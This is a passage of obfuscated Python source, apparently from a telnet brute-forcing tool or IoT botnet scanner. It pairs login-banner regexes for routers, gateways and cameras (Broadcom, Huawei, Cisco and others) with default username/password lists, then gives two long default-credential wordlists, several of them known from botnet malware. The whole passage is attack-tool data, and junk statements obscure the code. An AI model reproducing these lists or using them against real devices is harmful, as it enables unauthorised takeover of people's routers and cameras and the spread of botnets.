 'ubnt/ubnt' ,
858
 'guest/guest123' ,
859
 'root/' ,
860
 'quser/quser' ,
861
 'user/user' ,
862
 'Alphanetworks/wrgn23_dlwbr_dir600b' ,
863
 ] ,
864
[ 'BCM963268 Broadband' ,
865
 'support/support' ,
866
 'support/1234' ,
867
 'admin/admin' ,
868
 '1234/1234' ,
869
 'admin/adslroot' ,
870
 'admin/CenturyL1nk' ,
871
 ] ,
872
[ 'BCM96338 ADSL' ,
873
 'admin/password' ,
874
 'support/support' ,
875
 'admin/362729' ,
876
 'admin/263297' ,
877
 'admin/admin' ,
878
 ] ,
879
[ 'BCM96328 Broadband' ,
880
 'admin/password' ,
881
 'admin/admin' ,
882
 'support/support' ,
883
 'user/user' ,
884
 '1234/1234' ,
885
 'user/user' ,
886
 'admin/administrator' ,
887
 'support/1234' ,
888
 'root/12345' ,
889
 'admin/gvt12345' ,
890
 'admin/362729' ,
891
 'admin/' ,
892
 ] ,
893
[ 'BCM96818 Broadband' ,
894
 'user/user' ,
895
 'admin/password' ,
896
 'user/password' ,
897
 ] ,
898
[ 'BCM96318 Broadband' ,
899
 'support/support' ,
900
 'admin/admin' ,
901
 'superadmin/Is$uper@dmin' ,
902
 'user/user' ,
903
 'admin/ho4uku6at' ,
904
 'support/1234' ,
905
 'admin/admin1234' ,
906
 'admin/admin01' ,
907
 ] ,
908
[ 'BCM96362 Broadband' ,
909
 'user/' ,
910
 ] ,
911
[ 'BCM96368 xDSL' ,
912
 'support/support' ,
913
 'telecomadmin/nE7jA%5m' ,
914
 ] ,
915
[ 'Residential Gateway' ,
916
 'support/support' ,
917
 'user/password' ,
918
 ] ,
919
[ 'router login:' ,
920
 'admin/1234' ,
921
 'user/1234' ,
922
 ] ,
923
[ 'NetComm ADSL2\S Wireless Router' ,
924
 'admin/admin' ,
925
 'support/support' ,
926
 'admin/362729' ,
927
 ] ,
928
[ 'Embedded Telnet Server.*WARNING:.*authorized users only' ,
929
 'cisco/cisco' ,
930
 ] ,
931
[ 'User Access Verification' ,
932
 "admin/admin" ,
933
 "cisco/cisco" ,
934
 "root/root" ,
935
 "admin/" ,
936
 "cisco/" ,
937
 "Cisco/Cisco" ,
938
 "admin/cisco" ,
939
 "administrator/administrator" ,
940
 "Advertisements/Advertisements" ,
941
 "admin/123456" ,
942
 "admin/password" ,
943
 "admin/admin123" ,
944
 "Administrator/password" ,
945
 "Admin/123" ,
946
 "router/router" ,
947
 "test/test123" ,
948
 "service/service" ,
949
 'admin/admin12345' ,
950
 'test/test' ,
951
 'admin/test' ,
952
 'root/1234' ,
953
 'telecom/telecom' ,
954
 'user/user' ,
955
 'admin/admin1' ,
956
 'Admin/123' ,
957
 'nagios/nagios' ,
958
 'mg3500/merlin' ,
959
 'Admin/1234' ,
960
 'piranha/piranha' ,
961
 'admin/root' ,
962
 'admin/ADMIN' ,
963
 'guest/guest' ,
964
 'admin/1234567890' ,
965
 'root/root1234' ,
966
 'support/123456' ,
967
 'test1/test1' ,
968
 ] ,
969
[ 'DAM-2160i' ,
970
 'admin/888888' ,
971
 ] ,
972
[ 'Please login' ,
973
 'super/sp-admin' ,
974
 'admin/password' ,
975
 'admin/sp-admin' ,
976
 ] ,
977
[ 'Admin/Admin' ,
978
 'Admin/Admin' ,
979
 ] ,
980
[ 'Elsist.*maintenance shell' ,
981
 'Admin/Admin' ,
982
 ] ,
983
[ '(Welcome Visiting Huawei Home|ATP Cli)' ,
984
 'admin/admin' ,
985
 'user/user' ,
986
 'root/admin' ,
987
 'admin/1234' ,
988
 'support/support' ,
989
 ] ,
990
[ '(AONT login|## login ##|192\.168\.0\.0 login)' ,
991
 'ONTUSER/SUGAR2A041' ,
992
 'root/root' ,
993
 'root/huigu309' ,
994
 'admin/admin' ,
995
 'IUSACELL/admin' ,
996
 'usradmin/usradmin' ,
997
 'CRAFTSPERSON/ALC#FGU' ,
998
 ] ,
999
[ 'Air\S+ login' ,
1000
 'root/12341234' ,
1001
 'root/admin' ,
1002
 'root/' ,
1003
 'admin/airlive' ,
1004
 'root/1234567' ,
1005
 'root/12341234' ,
1006
'root/ttnet' ,
1007
 'root/1111' ,
1008
 'root/1020304' ,
1009
 ] ,
1010
[ 'RT\-\d+\S+ login' ,
1011
 'root/12341234' ,
1012
 'root/Admin' ,
1013
 'root/ttnet' ,
1014
 'root/00000' ,
1015
 'admin/qwerty' ,
1016
 ] ,
1017
[ 'WR\d\d\S+ login' ,
1018
 'telnet/telnet' ,
1019
 ] ,
1020
[ 'ANS\S+ login' ,
1021
 'telnet/telnet' ,
1022
 ] ,
1023
[ 'Huawei Home Gateway' ,
1024
 'support/support' ,
1025
 ] ,
1026
[ 'FG1060N login' ,
1027
 "root/20080826"
1028
 ] ,
1029
 [ 'HT-TM05 login' ,
1030
 "root/20080826"
1031
 ] ,
1032
 [ 'M2M login' ,
1033
 "root/20080826"
1034
 ] ,
1035
 [ 'NEXTAV login' ,
1036
 "root/20080826"
1037
 ] ,
1038
 [ 'SVWIFI login' ,
1039
 "root/20080826"
1040
 ] ,
1041
 [ 'TM01 login' ,
1042
 "root/20080826"
1043
 ] ,
1044
 [ 'TM02 login' ,
1045
 "root/20080826"
1046
 ] ,
1047
 [ 'WD02 login' ,
1048
 "root/20080826"
1049
 ] ,
1050
 [ 'WD-N2 login' ,
1051
 "root/20080826"
1052
 ] ,
1053
 [ 'WeZeeCard login' ,
1054
 "root/20080826"
1055
 ] ,
1056
 [ 'WiDisk login' ,
1057
 "root/20080826"
1058
 ] ,
1059
 [ 'WIFIUSB2 login' ,
1060
 "root/20080826"
1061
 ] ,
1062
 [ 'ShAirDisk login' ,
1063
 "root/20080826"
1064
 ] ,
1065
 [ 'aigoWiFi login' ,
1066
 "root/20080826"
1067
 ] ,
1068
 ]
1069
if 32 - 32: oOOo0000o - Oo0Oo * OOooOO0 . Oo0Oo / oOOoO00oo0 % Oooo
1070
I1IIiI1i = [
1071
 "root/root" ,
1072
 "admin/admin" ,
1073
 "root/vizxv" ,
1074
 "root/GM8182" ,
1075
 "root/xc3511" ,
1076
 "root/xmhdipc" ,
1077
 "admin/1234" ,
1078
"admin/CenturyL1nk" ,
1079
"admin/QwestM0dem" ,
1080
"support/support" ,
1081
 "root/123456" ,
1082
 "root/1234" ,
1083
 "root/12345" ,
1084
 "root/1001chin" ,
1085
 "root/password" ,
1086
 "admin/password" ,
1087
 "root/54321" ,
1088
 "root/juantech" ,
1089
 "root/admin" ,
1090
 "admin/7ujMko0admin" ,
1091
 "admin/smcadmin" ,
1092
 "admin/admin1234" ,
1093
 "admin/12345" ,
1094
 "admin/123456" ,
1095
 "admin/1111" ,
1096
 "root/Zte521" ,
1097
 "root/jvbzd" ,
1098
 "user/user" ,
1099
 "admin/smcadmin" ,
1100
 "guest/guest" ,
1101
 "root/dreambox" ,
1102
 "root/zlxx." ,
1103
 "ubnt/ubnt" ,
1104
 "root/cat1029" ,
1105
 "root/hunt5759" ,
1106
 "root/adminpassword" ,
1107
 "root/5up" ,
1108
 "admin/zhone" ,
1109
 "admin/admin1" ,
1110
 "root/" ,
1111
 "admin/epicrouter" ,
1112
 "root/123456" ,
1113
 "root/antslq" ,
1114
 "admin/admin123" ,
1115
 "supervisor/zyad1234" ,
1116
 "admin/1234567890" ,
1117
 "superadmin/Is$uper@dmin" ,
1118
 "admin/ho4uku6at" ,
1119
 "support/admin" ,
1120
 "root/123" ,
1121
 "root/1234567890" ,
1122
 "1234/1234" ,
1123
 "admin/54321" ,
1124
 "root/win1dows" ,
1125
 "admin/" ,
1126
 "root/888888" ,
1127
"admin/888888" ,
1128
 "root/Win1doW$" ,
1129
 "mg3500/merlin" ,
1130
 "root/oelinux123" ,
1131
 "ubnt/ubnt" ,
1132
"admin/0000" ,
1133
 "admin/11111111" ,
1134
 "admin/4321" ,
1135
 "admin/654321" ,
1136
 "admin/666666" ,
1137
 "root/000000" ,
1138
 "root/founder88" ,
1139
 "root/1111" ,
1140
 "admin/system" ,
1141
 "guest/123456" ,
1142
 "root/666666" ,
1143
 "root/0000" ,
1144
 "root/Admin" ,
1145
 "root/00000" ,
1146
 "root/root123" ,
1147
 "root/ipcam_rt5350" ,
1148
 "guest/guest123" ,
1149
 "root/1" ,
1150
 "root/win1dows" ,
1151
 "Admin/Admin" ,
1152
 "ONTUSER/SUGAR2A041" ,
1153
 'admin/P@55w0rd!' ,
1154
 '123/123' ,
1155
]
1156
if 76 - 76: i1 . OOooOO0 / I11I1Ii * I11I1Ii
1157
iiIO0OOoo = [
1158
 '/' ,
1159
 "0/0" ,
1160
 "1111/1111" ,
1161
 "111111/111111" ,
1162
 "11111111/11111111" ,
1163
 "11111/x-admin" ,
1164
 '123/123' ,
1165
 "1234/1234" ,
1166
 "1502/1502" ,
1167
 "22222222/22222222" ,
1168
 "266344/266344" ,
1169
 "2800/2800" ,
1170
 "XXX:3500/24:123456" ,
1171
 "XXX:3500/24:pass" ,
1172
 "XXX:3500/24:12345" ,
1173
 "XXX:3500/24:3500/24" ,
1174
 "XXX:3500/24:h179350" ,
1175
 "3comcso/RIP000" ,
1176
 "666666/666666" ,
1177
 "7654321/7654321" ,
1178
 "888888/888888" ,
1179
 "a/a" ,
1180
 "aaa/" ,
1181
 "abarco/mistral5885" ,
1182
 "acc/acc" ,
1183
 "adfexc/adfexc" ,
1184
 "admin/" ,
1185
 'Admin/' ,
1186
 "admin/0" ,
1187
 "admin/0000" ,
1188
 "admin/1111" ,
1189
 "aDMIN/1111" ,
1190
 "admin/1111111" ,
1191
 "admin/11111111" ,
1192
 "admin/1111Admin" ,
1193
 "admin/123" ,
1194
 "Admin/123" ,
1195
 "admin/1234" ,
1196
 "Admin/1234" ,
1197
 "admin/12345" ,
1198
 "admin/123456" ,
1199
 "aDMIN/123456" ,
1200
 "Admin/123456" ,
1201
 "admin/1234567890" ,
1202
 "admin/123456Admin" ,
1203
 "Admin/123456Admin" ,
1204
 "admin/12345Admin" ,
1205
 "admin/1234admin" ,
1206
 "admin/123Admin" ,
1207
 "admin/12888" ,
1208
 "Admin/12888" ,
1209
 "admin1/password" ,
1210
 "admin/2222" ,
1211
 "admin/22222" ,
1212
 "admin/22222Admin" ,
1213
 "admin/2601hx" ,
1214
 "admin2/changeme" ,
1215
 "admin/362729" ,
1216
 "Admin/3UJUh2VemEfUte" ,
1217
 "admin/4321" ,
1218
 "admin/54321" ,
1219
 "Admin/5up" ,
1220
 "admin/654321" ,
1221
 "admin/666666" ,
1222
 "admin/7ujMko0admin" ,
1223
 "admin/7ujMko0vizxv" ,
1224
 "admin/888888" ,
1225
 "admin/9999" ,
1226
 "admin/99999999" ,
1227
 "admin/abc123" ,
1228
 "admin/access" ,
1229
 "admin/admin" ,
1230
 "admin/ADMIN" ,
1231
 "Admin/admin" ,
1232
 "Admin/Admin" ,
1233
 "ADMIN/ADMIN" ,
1234
 "admin/admin00" ,
1235
 'admin/admin01' ,
1236
 "admin/admin1" ,
1237
 "admin/admin123" ,
1238
 "admin/Admin123" ,
1239
 "admin/admin1234" ,
1240
 "admin/admin99" ,
1241
 "admin/Administration" ,
1242
 "admin/administrator" ,
1243
 "admin/adslolitec" ,
1244
 "admin/adslroot" ,
1245
 'admin/adslnadam' ,
1246
 "admin/Ait" ,
1247
 "admin/AitbISP4eCiG" ,
1248
 "admin/articon" ,
1249
 "admin/asante" ,
1250
 "admin/Ascend" ,
1251
 "admin/asd" ,
1252
 "Admin/atc456" ,
1253
 "admin/atlantis" ,
1254
 "admin/aquario" ,
1255
 "admin/Aquario" ,
1256
 "admin/barricade" ,
1257
 "admin/bayandsl" ,
1258
 "admin/BGCVDSL2" ,
1259
 "admin/bintec" ,
1260
 "admin/cableroot" ,
1261
 "admin/cciadmin" ,
1262
 "admin/CenturyL1nk" ,
1263
 "admin/changeme" ,
1264
 "admin/cisco" ,
1265
 "admin/COadmin123" ,
1266
 "admin/comcomcom" ,
1267
 "admin/conexant" ,
1268
 "admin/c@ntv2000" ,
1269
 "admin/default" ,
1270
 "admin/detmond" ,
1271
 "admin/diamond" ,
1272
 "admin/dvr2580222" ,
1273
 "admin/epicrouter" ,
1274
 "admin/extendnet" ,
1275
 "admin/fliradmin" ,
1276
 "admin/giraff" ,
1277
 "admin/gvt12345" ,
1278
 "admin/h@32LuyD" ,
1279
 "admin/hagpolm1" ,
1280
 "admin/hello" ,
1281
 "admin/ho4uku6at" ,
1282
 "admin/hp.com" ,
1283
 "admin/htc" ,
1284
 "Admin/huawei.com" ,
1285
 "admin/imss7.0" ,
1286
 "admin/ip20" ,
1287
 "admin/ip3000" ,
1288
 "admin/ip400" ,
1289
 "admin/ironport" ,
1290
 "admin/isee" ,
1291
 "Administrator/" ,
1292
 "administrator/1234" ,
1293
 "Administrator/-%).3-" ,
1294
 "Administrator/3!play" ,
1295
 "Administrator/3ware" ,
1296
 "Administrator/admin" ,
1297
 "administrator/administrator" ,
1298
 "ADMINISTRATOR/ADMINISTRATOR" ,
1299
 "Administrator/buh" ,
1300
 "Administrator/changeme" ,
1301
 "administrator/d1scovery" ,
1302
 "Administrator/ganteng" ,
1303
 "Administrator/ggdaseuaimhrke" ,
1304
 "Administrator/letmein" ,
1305
 "Administrator/password" ,
1306
 "Administrator/pilou" ,
1307
 "Administrator/public" ,
1308
 "Administrator/smcadmin" ,
1309
 'admin/2008x2BJAOTOtJK1' ,
1310
 'admin/2008B6ByVO_utFJ3' ,
1311
 'admin/2008x2CzFWOtTMWE' ,
1312
 "admin/ecom" ,
1313
 'admin/GPAdm1n_w1max' ,
1314
 'admin/hamlet' ,
1315
 'admin/hayesadsl' ,
1316
 "admin/jvc" ,
1317
 "admin/JVC" ,
1318
 "admin/kont2004" ,
1319
 "admin/linga" ,
1320
 "admin/Meins" ,
1321
 "admin/meinsm" ,
1322
 "admin/michaelangelo" ,
1323
 "admin/michelangelo" ,
1324
 "admin/microbusiness" ,
1325
 "admin/motorola" ,
1326
 "admin/mu" ,
1327
 "admin/my_DEMARC" ,
1328
 "admin/nCwMnJVGag" ,
1329
"admin/netadmin" ,
1330
 "admin/NetCache" ,
1331
 "admin/noway" ,
1332
 "admin/none" ,
1333
 "admin/OCS" ,
1334
 "admin/operator" ,
1335
 "admin/P@55w0rd!" ,
1336
 "admin/password" ,
1337
 "admin/pentagram" ,
1338
 "admin/pfsense" ,
1339
 "adminpldt/0123456789" ,
1340
 "adminpldt/12345676890" ,
1341
 "adminpldt/1234567890" ,
1342
 "admin/power" ,
1343
 "admin/Protector" ,
1344
 "admin/public" ,
1345
 "admin/pwp" ,
1346
 "admin/QwestM0dem" ,
1347
 "admin/radius" ,
1348
 "admin/rmnetlm" ,
1349
 "admin/root" ,
1350
 "admin/secure" ,
1351
 "admin/setup" ,
1352
 "admin/Sharp" ,
1353
 "admin/sitecom46" ,
1354
 "admin/skbiptv" ,
1355
 "admin/skb_wifi" ,
1356
 "admin/sky" ,
1357
 "admin/smallbusiness" ,
1358
 "admin/smcadmin" ,
1359
 "adminstat/OCS" ,
1360
 "adminstrator/changeme" ,
1361
 "Adminstrator/changeme" ,
1362
 "admin/superuser" ,
1363
 "admin/su@psir" ,
1364
 "admin/switch" ,
1365
 "admin/symbol" ,
1366
 "admin/synnet" ,
1367
 "admin/sysAdmin" ,
1368
 "admin/system" ,
1369
 "admintelecom/telecomadmin" ,
1370
 "admin/test" ,
1371
 "admin/test1" ,
1372
 'admin/telus177' ,
1373
 "admin/trendchip" ,
1374
 "admin/true" ,
1375
 "admin/tsunami" ,
1376
 "adminttd/adminttd" ,
1377
 "admin/Uq-4GIt3M" ,
1378
 "adminuser/OCS" ,
1379
 "admin/utstar" ,
1380
"adminview/OCS" ,
1381
 "admin/visual" ,
1382
 "admin/vnpt" ,
1383
 "admin/w2402" ,
1384
 "admin/wbox" ,
1385
 "admin/xad$l#12" ,
1386
 "admin/x-admin" ,
1387
 "admin/zhone" ,
1388
 "admin/zoomadsl" ,
1389
 'admin/ZmqVfoSIP' ,
1390
 "ADMN/admn" ,
1391
 "adsl/adsl1234" ,
1392
 "ADSL/expert03" ,
1393
 "ADVMAIL/HP" ,
1394
 "ADVMAIL/HPOFFICE" ,
1395
 'Afaq_shamel/stccpe_2007' ,
1396
 "Alphanetworks/firmware" ,
1397
 "Alphanetworks/wapnd03cm_dkbs_dap2555" ,
1398
 "Alphanetworks/wapnd04cm_dkbs_dap3525" ,
1399
 "Alphanetworks/wapnd15_dlob_dap1522b" ,
1400
 "Alphanetworks/wrgac01_dlob.hans_dir865" ,
1401
 "Alphanetworks/wrgg15_di524" ,
1402
 "Alphanetworks/wrgg19_c_dlwbr_dir300" ,
1403
 "Alphanetworks/wrgn22_dlwbr_dir615" ,
1404
 "Alphanetworks/wrgn23_dlwbr_dir300b" ,
1405
 "Alphanetworks/wrgn23_dlwbr_dir600b" ,
1406
 "Alphanetworks/wrgn28_dlob_dir412" ,
1407
 "Alphanetworks/wrgn39_dlob.hans_dir645" ,
1408
 "Alphanetworks/wrgn39_dlob.hans_dir645_V1" ,
1409
 "Alphanetworks/wrgn49_dlob_dir600b" ,
1410
 "Alphanetworks/wrgnd08_dlob_dir815" ,
1411
 "anonymous/any@" ,
1412
 "anonymous/Exabyte" ,
1413
 "Any/12345" ,
1414
 "apache/apache" ,
1415
 "apc/apc" ,
1416
 "arris/admin" ,
1417
 "ascend/ascend" ,
1418
 "at4400/at4400" ,
1419
 "baby/baby" ,
1420
 "backup/backup" ,
1421
 "bbsd-client/changeme2" ,
1422
 "bbsd-client/changeme2database" ,
1423
 "bbsd-client/NULL" ,
1424
 "bciim/bciimpw" ,
1425
 "bcim/bcimpw" ,
1426
 "bcms/bcmspw" ,
1427
 "bcnas/bcnaspw" ,
1428
 "bewan/bewan" ,
1429
 "bin/12345" ,
1430
 "blue/bluepw" ,
1431
 "browse/browsepw" ,
1432
 "browse/looker" ,
1433
 "cablecom/router" ,
1434
 "cablemodem/robotics" ,
1435
 "cac_admin/cacadmin" ,
1436
 'caimore/caimore' ,
1437
 "cas/cascade" ,
1438
 "ccrusr/ccrusr" ,
1439
 "cellit/cellit" ,
1440
 "centos/centos" ,
1441
 "cgadmin/cgadmin" ,
1442
 "cisco/cisco" ,
1443
 "cisco/CISCO" ,
1444
 "Cisco/Cisco" ,
1445
 "citel/password" ,
1446
 "cjadmin/CJHV_ap_0601" ,
1447
 "client/client" ,
1448
 "cmaker/cmaker" ,
1449
 "comcast/1234" ,
1450
 "comcast/comcast" ,
1451
 "corecess/corecess" ,
1452
 "craft/craft" ,
1453
 "craft/craftpw" ,
1454
 "craft/crftpw" ,
1455
 "CRAFTSPERSON/ALC#FGU" ,
1456
 "csgoserver/csgoserver" ,
1457
 "CSG/SESAME" ,
1458
 "cusadmin/highspeed" ,
1459
 "cust/custpw" ,
1460
 "customer/none" ,
1461
 "dadmin/dadmin01" ,
1462
 "daemon/" ,
1463
 "daemon/daemon" ,
1464
 "davox/davox" ,
1465
 "debug/d.e.b.u.g" ,
1466
 "debug/synnet" ,
1467
 "default/" ,
1468
 "default/default" ,
1469
 "default/video" ,
1470
 "demo/demo" ,
1471
 "deploy/deploy" ,
1472
 "deskalt/password" ,
1473
 "deskman/changeme" ,
1474
 "desknorm/password" ,
1475
 "deskres/password" ,
1476
 "dev/dev" ,
1477
 "device/device" ,
1478
 "dhs3mt/dhs3mt" ,
1479
 "dhs3pms/dhs3pms" ,
1480
 "diag/danger" ,
1481
 "diag/switch" ,
1482
 "disttech/4tas" ,
1483
 "dlink/default" ,
1484
 "dlink/dlink" ,
1485
 "D-Link/D-Link" ,
1486
 "DLink/DLink" ,
1487
 "dm/telnet" ,
1488
 "draytek/1234" ,
1489
 "draytek/1234Admin" ,
1490
 "DTA/TJM" ,
1491
 "e250/e250changeme" ,
1492
 "e500/e500changeme" ,
1493
 "echo/echo" ,
1494
 "edimax/software01" ,
1495
 "eng/engineer" ,
1496
 "engmode/hawk201" ,
1497
 "enquiry/enquirypw" ,
1498
 "epicrouter/admin" ,
1499
 "Factory/56789Admin" ,
1500
 "FIELD/HPONLY" ,
1501
 "FIELD/HPP187 SYS" ,
1502
 "FIELD/HPWORD PUB" ,
1503
 "FIELD/LOTUS" ,
1504
 "FIELD/MANAGER" ,
1505
 "FIELD/MGR" ,
1506
 "FIELD/SERVICE" ,
1507
 "field/support" ,
1508
 "FIELD/SUPPORT" ,
1509
 "ftp_admi/kilo1987" ,
1510
 "ftp/ftp" ,
1511
 "ftp_inst/pbxk1064" ,
1512
 "ftp_nmc/tuxalize" ,
1513
 "ftp_oper/help1954" ,
1514
 "ftpuser/asteriskftp" ,
1515
 "ftpuser/ftpuser" ,
1516
 "Geardog/Geardog" ,
1517
 "GEN1/gen1" ,
1518
 "GEN2/gen2" ,
1519
 "git/git" ,
1520
 "GlobalAdmin/GlobalAdmin" ,
1521
 "Glo/Glo" ,
1522
 "guest/12345" ,
1523
 "guest/123456" ,
1524
 "guest/54321" ,
1525
 "guest/guest" ,
1526
 "Guest/Guest" ,
1527
 "guest/guest123" ,
1528
 'guest/friend' ,
1529
 "guest/truetime" ,
1530
 "guest/user" ,
1531
 "guest/xc3511" ,
1532
 "hadoop/hadoop" ,
1533
 "halt/tlah" ,
1534
 "HELLO/FIELD.SUPPORT" ,
1535
 "HELLO/MANAGER.SYS" ,
1536
 "HELLO/MGR.SYS" ,
1537
 "HELLO/OP.OPERATOR" ,
1538
 "helpdesk/OCS" ,
1539
 'home/zonnet' ,
1540
 "homebro/homebro" ,
1541
 "homeultera/homeultera" ,
1542
 "hsa/hsadb" ,
1543
 "hsa/hsasdb" ,
1544
 "hscroot/abc123" ,
1545
 "HTTP/HTTP" ,
1546
 "ibm/password" ,
1547
 "iclock/timely" ,
1548
 "inads/inads" ,
1549
 "inads/indspw" ,
1550
 "info/info" ,
1551
 "init/initpw" ,
1552
 "installer/installer" ,
1553
 "install/llatsni" ,
1554
 "install/secret" ,
1555
 "integrator/p1nacate" ,
1556
 "intel/intel" ,
1557
 "intermec/intermec" ,
1558
 "IntraStack/Asante" ,
1559
 "IntraSwitch/Asante" ,
1560
 "JDE/JDE" ,
1561
 "jenkins/jenkins" ,
1562
 "kermit/kermit" ,
1563
 "kpn/kpn-adsl" ,
1564
 "kroot/nespot" ,
1565
 "ktuser/homehub" ,
1566
 "ktuser/megaap" ,
1567
 "l2/l2" ,
1568
 "l3/l3" ,
1569
 "Linksys/admin" ,
1570
 "live/live" ,
1571
 "locate/locatepw" ,
1572
 'localadmin/localadmin' ,
1573
 "login/0" ,
1574
 "login/1111" ,
1575
 "login/8429" ,
1576
 "login/access" ,
1577
 "login/admin" ,
1578
 "login/pass" ,
1579
 "login/password" ,
1580
 "login/user" ,
1581
 "lp/lp" ,
1582
 "LUCENT01/UI-PSWD-01" ,
1583
 "LUCENT02/UI-PSWD-02" ,
1584
 "m1122/m1122" ,
1585
 "MAIL/HPOFFICE" ,
1586
 "MAIL/MAIL" ,
1587
 "MAIL/MPE" ,
1588
 "MAIL/REMOTE" ,
1589
 "MAIL/TELESUP" ,
1590
 "maint/maint" ,
1591
 "maint/maintpw" ,
1592
 "maint/ntacdmax" ,
1593
 "maint/rwmaint" ,
1594
 "manage/!manage" ,
1595
 "Manage/Manage" ,
1596
 "Management/TestingR2" ,
1597
 "manage/password" ,
1598
 "Manager/" ,
1599
 "manager/admin" ,
1600
 "MANAGER/COGNOS" ,
1601
 "manager/friend" ,
1602
 "Manager/friend" ,
1603
 "MANAGER/HPOFFICE" ,
1604
 "MANAGER/ITF3000" ,
1605
 "manager/manager" ,
1606
 "Manager/Manager" ,
1607
 "MANAGER/SECURITY" ,
1608
 "MANAGER/SYS" ,
1609
 "MANAGER/TCH" ,
1610
 "MANAGER/TELESUP" ,
1611
 "manuf/xxyyzz" ,
1612
 "MD110/help" ,
1613
 "MDaemon/MServer" ,
1614
 "mediator/mediator" ,
1615
 "MegaVNN/MegaVNN" ,
1616
 "memotec/supervisor" ,
1617
 "Menara/Menara" ,
1618
 "mg3500/merlin" ,
1619
 "MGR/CAROLIAN" ,
1620
 "MGR/CCC" ,
1621
 "MGR/CNAS" ,
1622
 "MGR/COGNOS" ,
1623
 "MGR/CONV" ,
1624
 "MGR/HPDESK" ,
1625
 "MGR/HPOFFICE" ,
1626
 "MGR/HPONLY" ,
1627
 "MGR/HPP187" ,
1628
 "MGR/HPP189" ,
1629
 "MGR/HPP196" ,
1630
 "MGR/INTX3" ,
1631
 "MGR/ITF3000" ,
1632
 "MGR/NETBASE" ,
1633
 "MGR/REGO" ,
1634
 "MGR/RJE" ,
1635
 "MGR/ROBELLE" ,
1636
 "MGR/SECURITY" ,
1637
 "MGR/SYS" ,
1638
 "MGR/TELESUP" ,
1639
 "MGR/VESOFT" ,
1640
 "MGR/WORD" ,
1641
 "MGR/XLSERVER" ,
1642
 "MICRO/RSX" ,
1643
 "micros/micros" ,
1644
 "minecraft/minecraft" ,
1645
 "mlusr/mlusr" ,
1646
 "monitor/monitor" ,
1647
 "mother/fucker" ,
1648
 "mountsys/mountsys" ,
1649
 "mso/w0rkplac3rul3s" ,
1650
 "mtch/mtch" ,
1651
 "mtcl/mtcl" ,
1652
 "museadmin/Muse!Admin" ,
1653
 "mysql/mysql" ,
1654
 "naadmin/naadmin" ,
1655
 "nagios/nagios" ,
1656
 "NAU/NAU" ,
1657
 "netadmin/nimdaten" ,
1658
 "netgear/netgear" ,
1659
 "netman/" ,
1660
 "netman/netman" ,
1661
 "netopia/netopia" ,
1662
 "netrangr/attack" ,
1663
 "netscreen/netscreen" ,
1664
 "NETWORK/NETWORK" ,
1665
 "NICONEX/NICONEX" ,
1666
 "nms/nmspw" ,
1667
 "nobody/nobody" ,
1668
 "nobody/tmadmin" ,
1669
 "none/0" ,
1670
 "none/0Admin" ,
1671
 "none/4getme2" ,
1672
 "none/admin" ,
1673
 "none/admin00" ,
1674
 "none/ascend" ,
1675
 "none/backdoor" ,
1676
 "none/BRIDGE" ,
1677
 "none/Col2ogro2" ,
1678
 "none/Helpdesk" ,
1679
 "none/laflaf" ,
1680
 "none/Master" ,
1681
 "none/NetICs" ,
1682
 "none/Posterie" ,
1683
 "none/smcadmin" ,
1684
 "none/Super" ,
1685
 "none/xdfk9874t3" ,
1686
 "ONTUSER/SUGAR2A041" ,
1687
 "openlgtv/openlgtv" ,
1688
 "operator/1234User" ,
1689
 "operator/$chwarzepumpe" ,
1690
 "OPERATOR/COGNOS" ,
1691
 "operator/col1ma" ,
1692
 "OPERATOR/DISC" ,
1693
 "operator/mercury" ,
1694
 "operator/operator" ,
1695
 "OPERATOR/SUPPORT" ,
1696
 "OPERATOR/SYS" ,
1697
 "OPERATOR/SYSTEM" ,
1698
 "op/op" ,
1699
 "op/operator" ,
1700
 "oracle/oracle" ,
1701
 "osmc/osmc" ,
1702
 "patrol/patrol" ,
1703
 "PBX/PBX" ,
1704
 "PCUSER/SYS" ,
1705
 "PFCUser/240653C9467E45" ,
1706
 "piranha/piranha" ,
1707
 "piranha/q" ,
1708
 "pi/raspberry" ,
1709
 "PlcmSpIp/PlcmSpIp" ,
1710
 "pldtadmin/1234567890" ,
1711
 "poll/tech" ,
1712
 "Polycom/SpIp" ,
1713
 "pos/pos" ,
1714
 "postgres/postgres" ,
1715
 "PRODDTA/PRODDTA" ,
1716
 "PSEAdmin/$secure$" ,
1717
 "public/public" ,
1718
 "quser/quser" ,
1719
 "radware/radware" ,
1720
 "rapport/r@p8p0r+" ,
1721
 "rcust/rcustpw" ,
1722
 "readonly/lucenttech2" ,
1723
 "readwrite/lucenttech1" ,
1724
 "recovery/recovery" ,
1725
 "replicator/replicator" ,
1726
 "RMUser1/password" ,
1727
 "!root/" ,
1728
 "root/" ,
1729
 "root/0" ,
1730
 "root/0000" ,
1731
 "root/00000" ,
1732
 "root/000000" ,
1733
 "root/00000000" ,
1734
 "root/1" ,
1735
 "root/1001chin" ,
1736
 "root/1111" ,
1737
 "root/123" ,
1738
 "root/123123" ,
1739
 "root/1234" ,
1740
 "root/12341234" ,
1741
 "root/12345" ,
1742
 "root/123456" ,
1743
 "root/1234567" ,
1744
 "root/1234567890" ,
1745
 "root/1234qwer" ,
1746
 "root/1234User" ,
1747
 "root/20080826" ,
1748
 "root/2222222" ,
1749
 "root/22222222" ,
1750
 "root/33333333" ,
1751
 "root/321" ,
1752
 "root/33" ,
1753
 "root/333" ,
1754
 "root/3ep5w2u" ,
1755
 "root/4321" ,
1756
 "root/54321" ,
1757
 "root/5up" ,
1758
 "root/654321" ,
1759
 "root/666666" ,
1760
 "root/696969" ,
1761
 "root/7ujMko0admin" ,
1762
 "root/7ujMko0vizxv" ,
1763
 "root/888888" ,
1764
 "root/a6a7wimax" ,
1765
 "root/admin" ,
1766
 "root/Admin" ,
1767
 "root/admin99" ,
1768
 "root/admin_1" ,
1769
 "root/adminpassword" ,
1770
 "root/ahetzip8" ,
1771
 "root/alpine" ,
1772
 "root/anko" ,
1773
 "root/antslq" ,
1774
 "root/ascend" ,
1775
 'root/asmcadmin' ,
1776
 "root/attack" ,
1777
 "root/avtech" ,
1778
 "root/awind5885" ,
1779
 "root/b120root" ,
1780
 "root/blender" ,
1781
 "root/calvin" ,
1782
 "root/camera" ,
1783
 "root/cat1029" ,
1784
 "root/changeme" ,
1785
 "root/Cisco" ,
1786
 "root/cms500" ,
1787
 "root/comcom" ,
1788
 "root/coolphoenix579" ,
1789
 "root/davox" ,
1790
 "root/default" ,
1791
 "root/dreambox" ,
1792
 "root/dreambox" ,
1793
 "root/fivranne" ,
1794
 "root/founder88" ,
1795
 "root/ggdaseuaimhrke" ,
1796
 "root/GM8182" ,
1797
 "root/GMB182" ,
1798
 "root/hi3518" ,
1799
 "root/huigu309" ,
1800
 "root/hunt5759" ,
1801
